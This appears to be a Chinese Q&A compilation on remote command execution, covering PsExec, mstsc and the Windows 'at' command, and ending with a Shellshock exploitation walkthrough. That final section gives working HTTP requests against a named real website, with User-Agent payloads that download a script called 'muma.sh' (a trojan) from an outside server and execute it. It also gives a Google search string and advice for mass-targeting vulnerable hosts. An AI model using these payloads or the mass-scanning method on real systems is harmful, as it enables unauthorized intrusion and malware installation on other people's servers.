① 如何用命令執行遠程EXE程序
他的B.DLL文件不對!!!
② 如何使用 PsExec 執行遠程命令
實用工具(如 Telnet)和遠程式控制製程序(如 Symantec 的 PC Anywhere)使您可以在遠程系統上執行程序,但安裝它們非常困難,並且需要您在想要訪問的遠程系統上安裝客戶端軟體。
PsExec 是一個輕型的 telnet 替代工具,它使您無需手動安裝客戶端軟體即可執行其他系統上的進程,並且可以獲得與控制台應用程序相當的完全交互性。
PsExec 最強大的功能之一是在遠程系統和遠程支持工具(如 IpConfig)中啟動互動式命令提示窗口,以便顯示無法通過其他方式顯示的有關遠程系統的信息。
psexec是一個遠程執行工具,你可以像使用telnet一樣使用它。
它的使用格式為:
psexec \\遠程機器ip [-u username [-p password]] [-c [-f]] [-i][-d] program [arguments]
它的參數有:
-u 後面跟用戶名 -p後面是跟密碼的,如果建立ipc連接後這兩個參數則不需要。
(如果沒有-p參數,則輸入命令後會要求你輸入密碼)
-c <[路徑]文件名>:拷貝文件到遠程機器並運行(注意:運行結束後文件會自動刪除)
-d 不等待程序執行完就返回
(比如要讓遠程機器運行tftp服務端的時候使用,不然psexec命令會一直等待tftp程序結束才會返回)
-i 在遠程機器上運行一個名為psexesvc進程,(到底什麼用弄不明白)
假設我在遠程機器ip有一個賬號,賬號名是:abc 密碼是:123
比如想要用telnet一樣在遠程系統上執行命令可以打:(遠程系統要開admin$)
psexec \\遠程機器ip -u abc -p 123 cmd
如果想要遠程機器執行本地c:\srm.exe文件可以打:
psexec \\遠程機器ip -u abc -p 123 -c c:\srm.exe
如果想要讓遠程機器執行本地上tftp服務端,(假設tftp服務端在本地c:\tftp32.exe),可以打:
psexec \\遠程機器ip -u abc -p 123 -c c:\tftp32.exe -d
③ 遠程式控制制的命令是什麼
計算機
遠程式控制制
的命令是「mstsc」。它的全稱為「Microsoft
terminal
services
client」,指創建與
終端伺服器
或其他遠程計算機的連接,編輯現有「遠程桌面連接(.rdp)」配置文件。
mstsc還有一種說法,MicrosoftTelnetScreenControl,即「微軟遠程桌面控制」。
mstsc的具體用法如下:
1、單擊屏幕左下角的「開始」菜單
2、在彈出菜單中單擊「運行」,也可以使用
鍵盤
的WIN+R組合鍵調出「運行」欄
3、在「運行」欄中輸入「mstsc「,然後點擊」確定「
4、啟動mstsc
5、在「計算機」一欄輸入需要遠程式控制制的計算機IP地址,單擊「連接」
6、彈出對方計算機的登錄畫面。輸入該計算機的
用戶名
和
密碼
,即可登錄進行遠程操作。
④ 如何將dos命令在遠程電腦上執行
有遠程電腦的IP地址,遠程電腦不是內網。
知道電腦的用戶名和密碼。
用TELNET登錄。
⑤ 如何執行遠程計算機的dos命令
是bat參數問題
編寫bat時,考慮到參數,調用的時候,加入遠程計算機名作為參數
例外,貌似需要遠程許可權的說,dos可以干壞事的
⑥ 遠程式控制制的運行處命令
mstsc.exe
⑦ 怎樣通過CMD命令執行一個遠程主機上的exe用哪個命令
At 命令
列出在指定的時間和日期在計算機上運行的已計劃命令或計劃命令和程序。必須正在運行「計劃」服務才能使用 at 命令。
at [\\computername] [[id] [/delete] | /delete [/yes]]
at [\\computername] time [/interactive] [/every:date[,...]| /next:date[,...]] command
參數
無
如果在沒有參數的情況下使用,則 at 列出已計劃的命令。
\\computername
指定遠程計算機。如果省略該參數,命令將安排在本地計算機。
id
指定指派給已計劃命令的識別碼。
/delete
取消已計劃的命令。如果省略了 id,計算機中已計劃的命令將被全部取消。
/yes
當刪除已計劃的事件時,對系統的查詢強制進行肯定的回答。
time
指定運行命令的時間。將時間以 24 小時標記(00:00 [午夜] 到 23:59)的方式表示為小時:分鍾。
/interactive
允許作業與在作業運行時登錄用戶的桌面進行交互。
/every:date[,...]
在每個星期或月的指定日期(例如,每個星期四,或每月的第三天)運行命令。將 date 指定為星期的一天或多天 (M,T,W,Th,F,S,Su),或月的一天或多天(使用 1 到 31 的數字)。用逗號分隔多個日期項。如果省略了 date,將假定為該月的當前日期。
/next:date[,...]
在重復出現下一天(例如,下個星期四)時,運行指定命令將 date 指定為星期的一天或多天 (M,T,W,Th,F,S,Su),或月的一天或多天(使用 1 到 31 的數字)。用逗號分隔多個日期項。如果省略了 date,將假定為該月的當前日期。
command
指定要運行的 Windows 2000 命令、程序(.exe 或 .com 文件)或批處理程序(.bat 或 .cmd 文件)。當命令需要路徑作為參數時,請使用絕對路徑,也就是從驅動器號開始的整個路徑。如果命令在遠程計算機上,請指定伺服器和共享名的 UNC 符號,而不是遠程驅動器號。如果命令不是可執行 (.exe) 文件,必須在命令前加上 cmd /c,例如:
cmd /c dir > c:\test.out
⑧ 遠程代碼執行漏洞是什麼意思
簡而言之,就是攻擊者可以利用這個漏洞對你上網進行攻擊,使你執行一些非預期的指令,甚至得到你的系統控制權。希望可以幫到你。
⑨ bash遠程命令執行漏洞 怎麼修復
從昨天開始,這個從澳大利亞遠渡重洋而來的BASH遠程命令執行漏洞就沸騰了整個FreeBuf,大家都在談論,「互聯網的心臟又出血了」,可是,親,到底怎麼對網站進行測試?下面這段腳本
$ env x=『() { :;}; echo vulnerable' bash -c "echo this is a test"
真的如各路大神們說的這樣嗎?
它與「心臟出血」漏洞不同,「心臟出血」只能藉助竊取用戶電腦信息,而bash 漏洞允許黑客遠程式控制制電腦,拿到系統最高許可權!其方法利用就更簡單了——復制/粘貼一行命令代碼即可!
Bash漏洞為什麼能夠執行
Bash漏洞的原理:
BASH除了可以將shell變數導出為環境變數,還可以將shell函數導出為環境變數!當前版本的bash通過以函數名作為環境變數名,以「(){」開頭的字串作為環境變數的值來將函數定義導出為環境變數。
此次爆出的漏洞在於BASH處理這樣的「函數環境變數」的時候,並沒有以函數結尾「}」為結束,而是一直執行其後的shell命令。
簡單地說就是,Bash腳本在解析某些特殊字元串時出現邏輯錯誤導致可以執行後面的命令。
Bash漏洞與遠程執行有啥聯系
看到上面的解釋,很多童鞋都理解成了本地的漏洞,然後很多人又覺得,本地有啥可以利用的,於是就忽略了這個神級漏洞的存在。我想說的是,這個漏洞,利用熱度可以媲美當年的MS08-067,威力雖然弱了點,但遠程式控制制電腦還是可以的。
首先解釋一下cgi腳本。很多網站類似下面的鏈接:
GET http://help.tenpay.com/cgi-bin/helpcenter/help_center.cgi?id=20HTTP/1.1
後台不僅僅用python、Perl來解釋執行並反饋給客戶端Response,當然還可以換做bash腳本來解釋執行提交上來的GET/POST請求。所以,理論上,你在HTTP請求中插入一個Bash命令,比如
() { :;}; wget http://www.myvps.org/testvul.sh
如果伺服器的Bash解釋器具有這個漏洞,那麼在解釋上面這這句話的時候就會執行wget請求,將一個惡意的testvul.sh文件下載到這個伺服器,那為何說要放在HTTP頭部呢?比如:
GET /cgi-bin/helpcenter/help_center.cgi?id=20 HTTP/1.1
Host: help.tenpay.com
User-Agent: Mozilla/5.0 (X11; Ubuntu; rv:32.0) Gecko/20100101 Firefox/32.0
Accept: */*
Referer: http://www..com
Connection: keep-alive
這是因為這個漏洞是bash解釋器在解釋某些特殊的變數時才可以觸發的:
在於BASH處理以「(){」開頭的「函數環境變數」的時候,並沒有以函數結尾「}」為結束,而是一直執行其後的shell命令
通過自定義這些參數的值為「函數環境變數」的形式,就可以觸發後面的命令,惡意的客戶僅需要發送特殊構造的HTTP請求就可以使伺服器執行特定的命令(命令的許可權和解釋HTTP請求的Bash腳本環境相同)。
實際測試中,我的構造的測試請求:
GET /cgi-bin/helpcenter/help_center.cgi?id=20 HTTP/1.1
Host: help.tenpay.com
User-Agent: () { :;}; /usr/bin/wget http://myvps.org/remember_client_ip.php
Accept: */*
Referer: http://www..com
Connection: keep-alive
過程是這樣的:
我發送GET請求–>目標伺服器cgi路徑
目標伺服器解析這個get請求,碰到UserAgent後面的參數,Bash解釋器就執行了後面的命令
目標伺服器wget–>我的myvps.org
我的vps記錄下這個訪問的IP地址
然後查看我的myvps.org伺服器的訪問記錄,就可以確定目標有沒有去訪問,如果訪問了,那麼,很好,它是有漏洞的。下面是我的VPS接收到的wget請求訪問的日誌:
大神是這樣測試漏洞的
當然,你也可以這樣構造:
GET /cgi-bin/helpcenter/help_center.cgi?id=20 HTTP/1.1
Host: help.tenpay.com
User-Agent: () { :;}; /usr/bin/wget -O /tmp/muma.sh ;chmod 777 /tmp/muma.sh; ./tmp/muma.sh
Accept: */*
Referer: http://www..com
Connection: keep-alive
實際上執行了下面三句:
/usr/bin/wget -O /tmp/muma.sh http://myvps.org/muma.sh ;
chmod 777 /tmp/muma.sh;
./tmp/muma.sh
你會發現,腳本就執行了,這就是Bash漏洞利用測試的精髓。
當然,你可以利用批量Google搜索:
filetype:cgi inurl:cgi-bin site:jp
然後批量提交類似的GET請求,你就能做到批量測試了。測試表明,500個url里有6-8個有bash漏洞